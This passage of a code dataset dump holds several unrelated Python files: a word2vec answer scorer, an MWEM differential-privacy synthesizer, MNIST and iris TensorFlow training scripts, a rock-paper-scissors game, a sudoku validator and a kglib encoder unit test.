ipyth_utils import tokenize\nimport codecs\nimport time\n\n\n## return word2vec(word)\ndef getword2vecval (N,w,word2vec):\n i = 0\n resh_w2v = []\n while resh_w2v ==[] and i<8:\n resh_w2v = list(word2vec[w.lower()])\n i = i+1\n\n #print (resh_w2v)\n if resh_w2v == []:\n resh_w2v = np.zeros(N, dtype=float)\n print (w)\n resh_w2v = np.array(resh_w2v)\n return resh_w2v\n\n\ndef evaluate_score (y_model, y_real):\n model_score = sum(y_model==y_real)/len(y_real)\n return model_score\n \n\n##\n## N - dimensionality of word2vec \n##\ndef predict_cosine_answers(data, word2vec, N, ngram):\n\n stop = stopwords.words('english')\n\n pred_answs = []\n pred_probs = [[\"A\", \"B\", \"C\", \"D\"]]\n for i in range(data.shape[0]):\n #calculate word2vec for question\n q_vec = np.zeros(N, dtype=float)\n for w in tokenize(data['question'][i], ngram):\n if w.lower() in word2vec and w.lower() not in stop:\n w2 = getword2vecval (N,w.lower(),word2vec)\n q_vec = np.add(q_vec, w2)\n q_vec = q_vec / linalg.norm(q_vec)\n \n #calculate word2vec for answers\n A_vec = np.zeros(N, 
dtype=float)\n B_vec = np.zeros(N, dtype=float)\n C_vec = np.zeros(N, dtype=float)\n D_vec = np.zeros(N, dtype=float)\n for w in tokenize(data['answerA'][i], ngram):\n if w.lower() in word2vec and w.lower() not in stop:\n w2 = getword2vecval (N,w.lower(),word2vec)\n #print (w2[0:4])\n A_vec = np.add(A_vec,w2)\n \n for w in tokenize(data['answerB'][i], ngram):\n if w.lower() in word2vec and w.lower() not in stop:\n w2 = getword2vecval (N,w.lower(),word2vec)\n #print (w2[0:4])\n B_vec = np.add(B_vec,w2)\n \n for w in tokenize(data['answerC'][i], ngram):\n if w.lower() in word2vec and w.lower() not in stop:\n w2 = getword2vecval (N,w.lower(),word2vec)\n #print (w2[0:4])\n C_vec = np.add(C_vec,w2)\n\n \n for w in tokenize(data['answerD'][i], ngram):\n if w.lower() in word2vec and w.lower() not in stop:\n w2 = getword2vecval (N,w.lower(),word2vec)\n #print (w2[0:4])\n D_vec = np.add(D_vec,w2)\n \n A_vec = A_vec / linalg.norm(A_vec) \n B_vec = B_vec / linalg.norm(B_vec)\n C_vec = C_vec / linalg.norm(C_vec)\n D_vec = D_vec / linalg.norm(D_vec)\n \n #choose question based on cosine distance\n idx = np.concatenate((A_vec, B_vec, C_vec, D_vec)).reshape(4, N).dot(q_vec).argmax()\n probs = np.concatenate((A_vec, B_vec, C_vec, D_vec)).reshape(4, N).dot(q_vec)\n pred_answs.append([\"A\", \"B\", \"C\", \"D\"][idx])\n pred_probs.append(probs)\n \n return pred_answs, pred_probs\n","sub_path":"Ipython/utils/ipyth_word2_vec.py","file_name":"ipyth_word2_vec.py","file_ext":"py","file_size_in_byte":2998,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"44190999","text":"import math\nimport random\nimport warnings\n\nimport numpy as np\nimport pandas as pd\n\nfrom opendp.smartnoise.synthesizers.base import SDGYMBaseSynthesizer\n\n\nclass MWEMSynthesizer(SDGYMBaseSynthesizer):\n \"\"\"\n N-Dimensional numpy implementation of MWEM.\n (http://users.cms.caltech.edu/~katrina/papers/mwem-nips.pdf)\n\n From the paper:\n \"[MWEM is] a broadly applicable, simple, and easy-to-implement algorithm, capable of\n substantially improving the performance of linear queries on many realistic datasets...\n (circa 2012)...MWEM matches the best known and nearly\n optimal theoretical accuracy guarantees for differentially private\n data analysis with linear queries.\"\n\n Linear queries used for sampling in this implementation are\n random contiguous slices of the n-dimensional numpy array.\n \"\"\"\n\n def __init__(\n self,\n q_count=400,\n epsilon=3.0,\n iterations=30,\n mult_weights_iterations=20,\n splits=[],\n split_factor=None,\n max_bin_count=500,\n custom_bin_count={},\n ):\n self.q_count = q_count\n self.epsilon = epsilon\n self.iterations = iterations\n self.mult_weights_iterations = mult_weights_iterations\n self.synthetic_data = None\n self.data_bins = None\n self.real_data = None\n self.splits = splits\n self.split_factor = split_factor\n self.max_bin_count = max_bin_count\n self.mins_maxes = {}\n self.scale = {}\n self.custom_bin_count = custom_bin_count\n\n # Pandas check\n self.pandas = False\n self.pd_cols = None\n self.pd_index = None\n\n # Query trackers\n self.q_values = None\n self.max_retries_exp_mechanism = 50\n\n def fit(self, data, categorical_columns=None, ordinal_columns=None):\n \"\"\"\n Creates a synthetic histogram distribution, based on the original data.\n Follows sdgym schema to be compatible with their benchmark system.\n :param data: Dataset to use as basis for synthetic data\n :type data: np.ndarray\n :return: synthetic data, real data 
histograms\n :rtype: np.ndarray\n \"\"\"\n if isinstance(data, np.ndarray):\n self.data = data.copy()\n elif isinstance(data, pd.DataFrame):\n self.pandas = True\n for col in data.columns:\n data[col] = pd.to_numeric(data[col], errors=\"ignore\")\n self.data = data.to_numpy().copy()\n self.pd_cols = data.columns\n self.pd_index = data.index\n else:\n raise ValueError(\"Data must be a numpy array or pandas dataframe.\")\n if self.split_factor is not None and self.splits == []:\n self.splits = self._generate_splits(data.T.shape[0], self.split_factor)\n self.splits = np.array(self.splits)\n if self.splits.size == 0:\n self.histograms = self._histogram_from_data_attributes(\n self.data, [np.arange(self.data.shape[1])]\n )\n else:\n self.histograms = self._histogram_from_data_attributes(self.data, self.splits)\n self.q_values = []\n for h in self.histograms:\n # h[1] is dimensions for each histogram\n self.q_values.append(self._compose_arbitrary_slices(self.q_count, h[1]))\n # Run the algorithm\n self.synthetic_histograms = self.mwem()\n\n def sample(self, samples):\n \"\"\"\n Creates samples from the histogram data.\n Follows sdgym schema to be compatible with their benchmark system.\n NOTE: We are sampleing from each split dimensional\n group as though they are *independent* from one another.\n We have essentially created len(splits) DP histograms as\n if they are separate databases, and combine the results into\n a single sample.\n :param samples: Number of samples to generate\n :type samples: int\n :return: N samples\n :rtype: list(np.ndarray)\n \"\"\"\n synthesized_columns = ()\n first = True\n for fake, _, split in self.synthetic_histograms:\n s = []\n fake_indices = np.arange(len(np.ravel(fake)))\n fake_distribution = np.ravel(fake)\n norm = np.sum(fake)\n for _ in range(samples):\n s.append(np.random.choice(fake_indices, p=(fake_distribution / norm)))\n s_unraveled = []\n for ind in s:\n s_unraveled.append(np.unravel_index(ind, fake.shape))\n # Here we make scale adjustments to match the original\n # data\n np_unraveled = np.array(s_unraveled)\n for i in range(np_unraveled.shape[-1]):\n min_c, max_c = self.mins_maxes[str(split[i])]\n # TODO: Deal with the 0 edge case when scaling\n # i.e. scale factor * 0th bin is 0,\n # but should still scale appropriately\n np_unraveled[:, i] = np_unraveled[:, i] * self.scale[str(split[i])]\n np_unraveled[:, i] = np_unraveled[:, i] + min_c\n if first:\n synthesized_columns = np_unraveled\n first = False\n else:\n synthesized_columns = np.hstack((synthesized_columns, np_unraveled))\n # Recombine the independent distributions into a single dataset\n combined = synthesized_columns\n # Reorder the columns to mirror their original order\n r = self._reorder(self.splits)\n if self.pandas:\n df = pd.DataFrame(combined[:, r], index=self.pd_index, columns=self.pd_cols)\n return df\n else:\n return combined[:, r]\n\n def mwem(self):\n \"\"\"\n Runner for the mwem algorithm.\n Initializes the synthetic histogram, and updates it\n for self.iterations using the exponential mechanism and\n multiplicative weights. 
Draws from the initialized query store\n for measurements.\n :return: synth_hist, self.histogram - synth_hist is the synthetic data histogram,\n self.histogram is original histo\n :rtype: np.ndarray, np.ndarray\n \"\"\"\n a_values = []\n for i, h in enumerate(self.histograms):\n hist = h[0]\n dimensions = h[1]\n split = h[3]\n queries = self.q_values[i]\n synth_hist = self._initialize_a(hist, dimensions)\n measurements = {}\n # NOTE: Here we perform a privacy check,\n # because if the histogram dimensions are\n # greater than the iterations, this can be\n # a big privacy risk (the sample queries will\n # otherwise be able to match the actual\n # distribution)\n # This usually occurs with a split factor of 1,\n # so that each attribute is independent of the other\n flat_dim = 1\n for j in dimensions:\n flat_dim *= j\n if 2 * flat_dim <= self.iterations:\n warnings.warn(\n \"Flattened dimensionality of synthetic histogram is less than\"\n + \" the number of iterations. This is a privacy risk.\"\n + \" Consider increasing your split_factor (especially if it is 1), \"\n + \"or decreasing the number of iterations. \"\n + \"Dim: \" + str(flat_dim) + \" Split: \" + str(split),\n Warning,\n )\n\n for i in range(self.iterations):\n # print(\"Iteration: \" + str(i))\n qi = self._exponential_mechanism(\n hist, synth_hist, queries, ((self.epsilon / (2 * self.iterations)) / len(self.histograms))\n )\n # Make sure we get a different query to measure:\n while qi in measurements:\n qi = self._exponential_mechanism(\n hist, synth_hist, queries, ((self.epsilon / (2 * self.iterations)) / len(self.histograms))\n )\n # NOTE: Add laplace noise here with budget\n evals = self._evaluate(queries[qi], hist)\n lap = self._laplace(\n (2 * self.iterations * len(self.histograms)) / (self.epsilon * len(dimensions))\n )\n measurements[qi] = evals + lap\n # Improve approximation with Multiplicative Weights\n synth_hist = self._multiplicative_weights(\n synth_hist, queries, measurements, hist, self.mult_weights_iterations\n )\n a_values.append((synth_hist, hist, split))\n return a_values\n\n def _initialize_a(self, histogram, dimensions):\n \"\"\"\n Initializes a uniform distribution histogram from\n the given histogram with dimensions\n :param histogram: Reference histogram\n :type histogram: np.ndarray\n :param dimensions: Reference dimensions\n :type dimensions: np.ndarray\n :return: New histogram, uniformly distributed according to\n reference histogram\n :rtype: np.ndarray\n \"\"\"\n # NOTE: Could actually use a distribution from real data with some budget,\n # as opposed to using this uniform dist (would take epsilon as argument,\n # and detract from it)\n n = np.sum(histogram)\n value = n / np.prod(dimensions)\n synth_hist = np.zeros_like(histogram)\n synth_hist += value\n return synth_hist\n\n def _histogram_from_data_attributes(self, data, splits=[]):\n \"\"\"\n Create a histogram from given data\n :param data: Reference histogram\n :type data: np.ndarray\n :return: Histogram over given data, dimensions,\n bins created (output of np.histogramdd)\n :rtype: np.ndarray, np.shape, np.ndarray\n \"\"\"\n histograms = []\n for split in splits:\n split_data = data[:, split]\n mins_data = []\n maxs_data = []\n dims_sizes = []\n # Transpose for column wise iteration\n for i, column in enumerate(split_data.T):\n min_c = min(column)\n max_c = max(column)\n # TODO: Make these noisy min/max\n mins_data.append(min_c)\n maxs_data.append(max_c)\n # Dimension size (number of bins)\n bin_count = int(max_c - min_c + 1)\n # Here we 
track the min and max for the column,\n # for sampling\n self.mins_maxes[str(split[i])] = (min_c, max_c)\n if bin_count > self.max_bin_count:\n # Note the limitations of MWEM here, specifically in the case of continuous data.\n warnings.warn(\n \"Bin count \"\n + str(bin_count)\n + \" in column: \"\n + str(split[i])\n + \" exceeds max_bin_count, defaulting to: \"\n + str(self.max_bin_count)\n + \". Is this a continuous variable?\",\n Warning,\n )\n bin_count = self.max_bin_count\n # We track a scaling factor per column, for sampling\n self.scale[str(split[i])] = (max_c - min_c + 1) / self.max_bin_count\n else:\n self.scale[str(split[i])] = 1\n if str(split[i]) in self.custom_bin_count:\n bin_count = int(self.custom_bin_count[str(split[i])])\n self.scale[str(split[i])] = 1\n dims_sizes.append(bin_count)\n # Produce an N,D dimensional histogram, where\n # we pre-specify the bin sizes to correspond with\n # our ranges above\n histogram, bins = np.histogramdd(split_data, bins=dims_sizes)\n # Return histogram, dimensions\n histograms.append((histogram, dims_sizes, bins, split))\n return histograms\n\n def _exponential_mechanism(self, hist, synth_hist, queries, eps):\n \"\"\"\n Refer to paper for in depth description of\n Exponential Mechanism.\n Parametrized with epsilon value epsilon/(2 * iterations)\n :param hist: Basis histogram\n :type hist: np.ndarray\n :param synth_hist: Synthetic histogram\n :type synth_hist: np.ndarray\n :param queries: Queries to draw from\n :type queries: list\n :param eps: Budget\n :type eps: float\n :return: # of errors\n :rtype: int\n \"\"\"\n errors = [\n abs(self._evaluate(queries[i], hist) - self._evaluate(queries[i], synth_hist)) * (eps / 2.0)\n for i in range(len(queries))\n ]\n maxi = max(errors)\n errors = [math.exp(errors[i] - maxi) for i in range(len(errors))]\n r = random.random()\n e_s = sum(errors)\n c = 0\n for i in range(len(errors)):\n c += errors[i]\n if c > r * e_s:\n return i\n return len(errors) - 1\n\n def _multiplicative_weights(self, synth_hist, queries, m, hist, iterate):\n \"\"\"\n Multiplicative weights update algorithm,\n used to boost the synthetic data accuracy given measurements m.\n Run for iterate times\n\n :param synth_hist: Synthetic histogram\n :type synth_hist: np.ndarray\n :param queries: Queries to draw from\n :type queries: list\n :param m: Measurements taken from real data for each qi query\n :type m: dict\n :param hist: Basis histogram\n :type hist: np.ndarray\n :param iterate: Number of iterations to run mult weights\n :type iterate: iterate\n :return: synth_hist\n :rtype: np.ndarray\n \"\"\"\n sum_a = np.sum(synth_hist)\n for _ in range(iterate):\n for qi in m:\n error = m[qi] - self._evaluate(queries[qi], synth_hist)\n # Perform the weights update\n query_update = self._binary_replace_in_place_slice(\n np.zeros_like(synth_hist.copy()), queries[qi])\n\n # Apply the update\n a_multiplier = np.exp(query_update * error / (2.0 * sum_a))\n a_multiplier[a_multiplier == 0.0] = 1.0\n synth_hist = synth_hist * a_multiplier\n # Normalize again\n count_a = np.sum(synth_hist)\n synth_hist = synth_hist * (sum_a / count_a)\n return synth_hist\n\n def _compose_arbitrary_slices(self, num_s, dimensions):\n \"\"\"\n Here, dimensions is the shape of the histogram\n We want to return a list of length num_s, containing\n random slice objects, given the dimensions\n These are our linear queries\n :param num_s: Number of queries (slices) to generate\n :type num_s: int\n :param dimensions: Dimensions of histogram to be sliced\n :type dimensions: 
np.shape\n :return: Collection of random np.s_ (linear queries) for\n a dataset with dimensions\n :rtype: list\n \"\"\"\n slices_list = []\n # TODO: For analysis, generate a distribution of slice sizes,\n # by running the list of slices on a dimensional array\n # and plotting the bucket size\n for _ in range(num_s):\n inds = []\n for _, s in np.ndenumerate(dimensions):\n # Random linear sample, within dimensions\n a = np.random.randint(s)\n b = np.random.randint(s)\n l_b = min(a, b)\n u_b = max(a, b) + 1\n pre = []\n pre.append(l_b)\n pre.append(u_b)\n inds.append(pre)\n # Compose slices\n sl = []\n for ind in inds:\n sl.append(np.s_[ind[0]: ind[1]])\n slices_list.append(sl)\n return slices_list\n\n def _evaluate(self, a_slice, data):\n \"\"\"\n Evaluate a count query i.e. an arbitrary slice\n :param a_slice: Random slice within bounds of flattened data length\n :type a_slice: np.s_\n :param data: Data to evaluate from (synthetic dset)\n :type data: np.ndarray\n :return: Count from data within slice\n :rtype: float\n \"\"\"\n # We want to count the number of objects in an\n # arbitrary slice of our collection\n # We use np.s_[arbitrary slice] as our queries\n e = data.T[tuple(a_slice)]\n\n if isinstance(e, np.ndarray):\n return np.sum(e)\n else:\n return e\n\n def _binary_replace_in_place_slice(self, data, a_slice):\n \"\"\"\n We want to create a binary copy of the data,\n so that we can easily perform our error multiplication\n in MW. Convenience function.\n :param data: Data\n :type data: np.ndarray\n :param a_slice: Slice\n :type a_slice: np.s_\n :return: Return data, where the range specified\n by a_slice is all 1s.\n :rtype: np.ndarray\n \"\"\"\n view = data.copy()\n view.T[tuple(a_slice)] = 1.0\n return view\n\n def _reorder(self, splits):\n \"\"\"\n Given an array of dimensionality splits (column indices)\n returns the corresponding reorder array (indices to return\n columns to original order)\n Example:\n original = [[1, 2, 3, 4, 5, 6],\n [ 6, 7, 8, 9, 10, 11]]\n\n splits = [[1,3,4],[0,2,5]]\n\n mod_data = [[2 4 5 1 3 6]\n [ 7 9 10 6 8 11]]\n\n reorder = [3 0 4 1 2 5]\n :param splits: 2d list with splits (column indices)\n :type splits: array of arrays\n :return: 1d array of indices that restores the original column order\n :rtype: np.ndarray\n \"\"\"\n flat = np.concatenate(np.asarray(splits)).ravel()\n reordered = np.zeros(len(flat))\n for i, ind in enumerate(flat):\n reordered[ind] = i\n return reordered.astype(int)\n\n def _generate_splits(self, n_dim, factor):\n \"\"\"\n If user specifies, do the work and figure out how to divide the dimensions\n into even splits to speed up MWEM\n Last split will contain leftovers <= sizeof(factor)\n :param n_dim: Total # of dimensions\n :type n_dim: int\n :param factor: Desired size of the splits\n :type factor: int\n :return: Splits\n :rtype: np.array(np.array(),...)\n \"\"\"\n # Columns indices\n indices = np.arange(n_dim)\n\n # Split intelligently\n fits = int((np.floor(len(indices) / factor)) * factor)\n even_inds = indices[:fits].reshape((int(len(indices) / factor), factor))\n s1 = even_inds.tolist()\n if indices[fits:].size > 0:\n s1.append(indices[fits:])\n s2 = [np.array(l_val) for l_val in s1]\n return np.array(s2)\n\n def _laplace(self, sigma):\n \"\"\"\n Laplace mechanism\n :param sigma: Laplace scale param sigma\n :type sigma: float\n :return: Random value from a Laplace distribution with scale sigma\n :rtype: float\n \"\"\"\n return sigma * np.log(random.random()) * np.random.choice([-1, 
1])\n","sub_path":"sdk/opendp/smartnoise/synthesizers/mwem.py","file_name":"mwem.py","file_ext":"py","file_size_in_byte":19323,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"591623760","text":"\"\"\"\nTrains a single MNIST convnet to minimize cross entropy, periodically reporting\nits accuracy and the time spent training it.\n\"\"\"\n\nimport datetime\nimport tensorflow as tf\nfrom mnist import ConvNet, MNIST_TRAIN_SIZE, MNIST_TEST_SIZE, MNIST_TEST_BATCH_SIZE,\\\n get_mnist_data, set_mnist_data\nfrom tensorflow.models.official.mnist.dataset import train, test\n\n\nif __name__ == '__main__':\n set_mnist_data(train('MNIST_data/'), test('MNIST_data/'))\n train_data, test_data = get_mnist_data()\n train_next = train_data.shuffle(MNIST_TRAIN_SIZE).batch(50).repeat().make_one_shot_iterator().get_next()\n test_iterator = test_data.batch(MNIST_TEST_BATCH_SIZE).make_initializable_iterator()\n test_next = test_iterator.get_next()\n\n sess = tf.Session()\n\n x = tf.placeholder(tf.float32, [None, 784])\n y_ = tf.placeholder(tf.int32, [None])\n one_hot_y_ = tf.one_hot(y_, 10)\n keep_prob = tf.placeholder(tf.float32)\n\n net = ConvNet(sess, x, one_hot_y_, keep_prob)\n cross_entropy = tf.reduce_mean(\n tf.nn.softmax_cross_entropy_with_logits_v2(labels=one_hot_y_, logits=net.y))\n optimizer = tf.train.AdamOptimizer(1e-4)\n train_step = optimizer.minimize(cross_entropy)\n\n net.initialize_variables()\n sess.run([var.initializer for var in optimizer.variables()])\n\n training_start = None\n training_time = datetime.timedelta()\n\n def print_stats() -> None:\n \"\"\"\n Calculates and prints the net's total training time and accuracy.\n \"\"\"\n global training_start, training_time\n if training_start is not None:\n training_time += datetime.datetime.now() - training_start\n print('Training time:', str(training_time))\n sess.run(test_iterator.initializer)\n size_accuracy = 0\n try:\n while True:\n test_images, test_labels = sess.run(test_next)\n batch_size = test_images.shape[0]\n batch_accuracy = sess.run(net.accuracy, feed_dict={x: test_images,\n y_: test_labels,\n keep_prob: 1})\n size_accuracy += batch_size * batch_accuracy\n except tf.errors.OutOfRangeError:\n pass\n print('Accuracy: %a' % (size_accuracy / MNIST_TEST_SIZE))\n training_start = datetime.datetime.now()\n\n step_num = 0\n while step_num < 20000:\n if step_num % 100 == 0:\n print('Step', step_num)\n if step_num % 500 == 0:\n print_stats()\n train_images, train_labels = sess.run(train_next)\n sess.run(train_step, feed_dict={x: train_images, y_: train_labels, keep_prob: 1})\n step_num += 1\n print_stats()\n","sub_path":"mnist_single.py","file_name":"mnist_single.py","file_ext":"py","file_size_in_byte":2771,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"567326884","text":"#! 
/usr/bin/env python\nfrom random import randint, seed\nfrom sys import exit, version_info\n\n# Python 2 and 3 compatibility.\ninput = raw_input if version_info[0] == 2 else input\n\n__version__ = '0.1'\n__author__ = 'JaINTP - Jai Brown'\n__maintainer__ = 'JaINTP - Jai Brown'\n__status__ = 'Development'\n\n\nclass RockPaperScissors(object):\n \"\"\"Basic class that handles a Rock, Paper, Scissors game.\"\"\"\n\n __slots__ = [\n '__choices'\n ]\n\n def __init__(self):\n \"\"\"Constructor.\n Initialises member variables.\n \"\"\"\n self.__choices = ['Rock', 'Paper', 'Scissors']\n\n def game_loop(self):\n \"\"\"Main method that handles the game logic.\"\"\"\n # Seed the random number generator.\n seed()\n\n # Enter main loop.\n while True:\n # Get user input.\n player_turn = self.get_input()\n # Get bot input.\n bot_turn = randint(0, 2)\n result = self.get_result(player_turn, bot_turn)\n\n # Output choices.\n print('You chose: {}\\nBot chose: {}'.format(\n self.__choices[player_turn],\n self.__choices[bot_turn]))\n\n # Check and declare results!\n if not result[0] and not result[1]:\n print('Tie!\\n')\n else:\n print('{} win{}!\\n'.format('Bot' if result[1] else 'You',\n 's' if result[1] else ''))\n\n @staticmethod\n def get_input():\n \"\"\" Retrieves the user's input with a menu style prompt.\n\n @rtype: int\n @return: The user's input, minus one.\n \"\"\"\n choice = None\n while True:\n try:\n print('Rock - 1\\nPaper - 2\\nScissors - 3\\nExit - 4')\n choice = int(input('Choice: '))\n\n if choice not in (1, 2, 3, 4):\n raise ValueError()\n else:\n break\n except (ValueError, SyntaxError):\n print('Invalid input!')\n\n if choice == 4:\n exit()\n return choice - 1\n\n def get_result(self, player_choice, bot_choice):\n \"\"\"Calculates the results of both the player's and the bot's turns.\n\n @type player_choice: int\n @param player_choice: The player's selection.\n\n @type bot_choice: int\n @param bot_choice: The bot's selection.\n\n @rtype: tuple\n @return: A tuple containing two booleans.\n Whether the player's turn won and whether the bot's turn won.\n \"\"\"\n # player_choice - 1 should equal the bot's choice to win.\n # Yes I know PEP8 says not to assign lambdas, but YOLO!\n algo = lambda a, b, c: c[b] == c[a - 1]\n\n player_wins = algo(player_choice, bot_choice, self.__choices)\n bot_wins = algo(bot_choice, player_choice, self.__choices)\n\n return player_wins, bot_wins\n\n\nif __name__ == '__main__':\n game = RockPaperScissors()\n game.game_loop()\n","sub_path":"RockPaperScissors.py","file_name":"RockPaperScissors.py","file_ext":"py","file_size_in_byte":3010,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"616645777","text":"class Solution(object):\n\n def isValidSudoku(self, board):\n \"\"\"\n :type board: List[List[str]]\n :rtype: bool\n \"\"\"\n row = [set([]) for i in range(9)]\n col = [set([]) for i in range(9)]\n grid = [set([]) for i in range(9)]\n\n for r in range(9):\n for c in range(9):\n if board[r][c] == '.':\n continue\n if board[r][c] in row[r]:\n return False\n if board[r][c] in col[c]:\n return False\n\n g = r // 3 * 3 + c // 3\n if board[r][c] in grid[g]:\n return False\n grid[g].add(board[r][c])\n row[r].add(board[r][c])\n col[c].add(board[r][c])\n\n return True\n\n\ns = Solution()\ns.isValidSudoku([\".87654321\",\n \"2........\", \"3........\", \"4........\",\n \"5........\", \"6........\", \"7........\",\n \"8........\", 
\"9........\"])\n","sub_path":"036.py","file_name":"036.py","file_ext":"py","file_size_in_byte":1007,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"409241795","text":"import numpy as np\nimport tensorflow as tf\nfrom sklearn.datasets import load_iris\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.preprocessing import StandardScaler\n\n# 加载iris数据集\niris = load_iris()\nprint(iris)\n# 数据的特征值\niris_data = iris['data']\n# 数据标签值 0 1 2\niris_target = iris['target']\n\n# 处理数据的标签值\n# 0-> [1,0,0]\n# 1-> [0,1,0]\n# 2-> [0,0,1]\niris_label = np.zeros((iris_target.shape[0], 3))\nfor i in range(iris_target.shape[0]):\n iris_label[i, iris_target[i]] = 1\n\n# 切割训练集和测试集,训练集80% 测试集20%\niris_data_train, iris_data_test, iris_label_train, iris_label_test = train_test_split(iris_data, iris_label, test_size=0.2, random_state=123)\n# 标准化数据\n# 生成标准化规则\nstdScaler = StandardScaler().fit(iris_data_train)\n# 应用规则到训练集、测试集\niris_data_trainStd = stdScaler.transform(iris_data_train)\niris_data_testStd = stdScaler.transform(iris_data_test)\n\n# 数据与标签的占位\n# 输入值,IRIS输入层有4个神经元,None表示输入样本的数量暂不确定,可输入多个样本\nx = tf.placeholder(tf.float32, shape=[None, 4])\n# 输出值,IRIS将数据分为3类,输出层有3个神经元,None表示输入样本的数量暂不确定\n# 真实值,后面用于和预测值比较计算准确率\ny_actual = tf.placeholder(tf.float32, shape=[None, 3])\n\n# 初始化权重和偏置,后面训练时需要更新\nW = tf.Variable(tf.zeros([4, 3]))\nb = tf.Variable(tf.zeros([3]))\n\n# 由于iris分类问题是一个多分类问题,所以激活函数选用softmax得到预测值\ny_predict = tf.nn.softmax(tf.matmul(x, W) + b)\n\n# 预测值和真实值,通过交叉熵函数,得到损失函数\ncross_entropy = tf.nn.sparse_softmax_cross_entropy_with_logits(logits=y_predict, labels=tf.argmax(y_actual, 1))\n\n# 通过梯度下降算法使得残差最小\ntrain_step = tf.train.GradientDescentOptimizer(0.01).minimize(cross_entropy)\n\n# 计算准确率\ncorrect_prediction = tf.equal(tf.argmax(y_predict, 1), tf.argmax(y_actual, 1))\n# 多个批次准确率均值\naccuracy = tf.reduce_mean(tf.cast(correct_prediction, 'float'))\n\n# 初始化变量 tf.zeros权重和偏置初始化为0\ninit = tf.global_variables_initializer()\n# 打开会话\nwith tf.Session() as sess:\n # 初始化变量\n sess.run(init)\n # 训练轮数为训练集样本数除以10,一轮喂10个样本\n for i in range(iris_label_train.shape[0] // 10):\n # 训练集批量喂入,一次喂10个样本\n data = iris_data_trainStd[i * 10:i * 10 + 10, :]\n label = iris_label_train[i * 10:i * 10 + 10, :]\n # 执行梯度下降算法,每执行一次,更新一次权重和偏置\n sess.run(train_step, feed_dict={x: data, y_actual: label})\n # 每更新一次参数,就使用测试集计算一次准确率\n print(\"accuracy:\", sess.run(accuracy, feed_dict={x: iris_data_testStd, y_actual: iris_label_test}))","sub_path":"iris_classification.py","file_name":"iris_classification.py","file_ext":"py","file_size_in_byte":2964,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"8876379","text":"#\n# Licensed to the Apache Software Foundation (ASF) under one\n# or more contributor license agreements. See the NOTICE file\n# distributed with this work for additional information\n# regarding copyright ownership. The ASF licenses this file\n# to you under the Apache License, Version 2.0 (the\n# \"License\"); you may not use this file except in compliance\n# with the License. You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing,\n# software distributed under the License is distributed on an\n# \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n# KIND, either express or implied. 
See the License for the\n# specific language governing permissions and limitations\n# under the License.\n#\n\nimport unittest\n\nimport numpy as np\nimport tensorflow as tf\nfrom unittest.mock import Mock\n\nfrom kglib.utils.test.utils import get_call_args\nfrom kglib.kgcn.models.typewise import TypewiseEncoder\n\n\nclass TestTypewiseEncoder(unittest.TestCase):\n def setUp(self):\n tf.enable_eager_execution()\n\n def test_types_encoded_by_expected_functions(self):\n things = np.array([[0, 0], [1, 0], [2, 0.5673]], dtype=np.float32)\n\n mock_entity_relation_encoder = Mock(return_value=np.array([[0, 0, 0], [0, 0, 0]], dtype=np.float32))\n\n mock_attribute_encoder = Mock(return_value=np.array([[0.9527, 0.2367, 0.7582]], dtype=np.float32))\n\n encoders_for_types = {lambda: mock_entity_relation_encoder: [0, 1], lambda: mock_attribute_encoder: [2]}\n\n tm = TypewiseEncoder(encoders_for_types, 3)\n encoding = tm(things) # The function under test\n\n np.testing.assert_array_equal([[np.array([[0], [0]], dtype=np.float32)]],\n get_call_args(mock_entity_relation_encoder))\n\n np.testing.assert_array_equal([[np.array([[0.5673]], dtype=np.float32)]], get_call_args(mock_attribute_encoder))\n\n expected_encoding = np.array([[0, 0, 0], [0, 0, 0], [0.9527, 0.2367, 0.7582]], dtype=np.float32)\n np.testing.assert_array_equal(expected_encoding, encoding.numpy())\n\n def test_basic_encoding(self):\n things = np.array([[0], [1], [2]], dtype=np.float32)\n\n mock_entity_relation_encoder = Mock(return_value=np.array([[0.1, 0, 0], [0.1, 0, 0], [0.1, 0, 0]], dtype=np.float32))\n\n encoders_for_types = {lambda: mock_entity_relation_encoder: [0, 1, 2]}\n\n tm = TypewiseEncoder(encoders_for_types, 3)\n encoding = tm(things) # The function under test\n\n expected_encoding = np.array([[0.1, 0, 0], [0.1, 0, 0], [0.1, 0, 0]], dtype=np.float32)\n np.testing.assert_array_equal(expected_encoding, encoding.numpy())\n\n def test_encoders_do_not_fulfil_classes(self):\n mock_entity_relation_encoder = Mock()\n\n encoders_for_types = {lambda: mock_entity_relation_encoder: [0, 2]}\n\n with self.assertRaises(ValueError) as context:\n TypewiseEncoder(encoders_for_types, 3)\n\n self.assertEqual('Encoder categories are inconsistent. Expected [0, 1, 2], but got [0, 2]',\n str(context.exception))\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"kglib/kgcn/models/typewise_test.py","file_name":"typewise_test.py","file_ext":"py","file_size_in_byte":3215,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"117878977","text":"##############################################################################\n#\n# Copyright (c) 2001, 2002 Zope Corporation and Contributors.\n# All Rights Reserved.\n#\n# This software is subject to the provisions of the Zope Public License,\n# Version 2.0 (ZPL). 
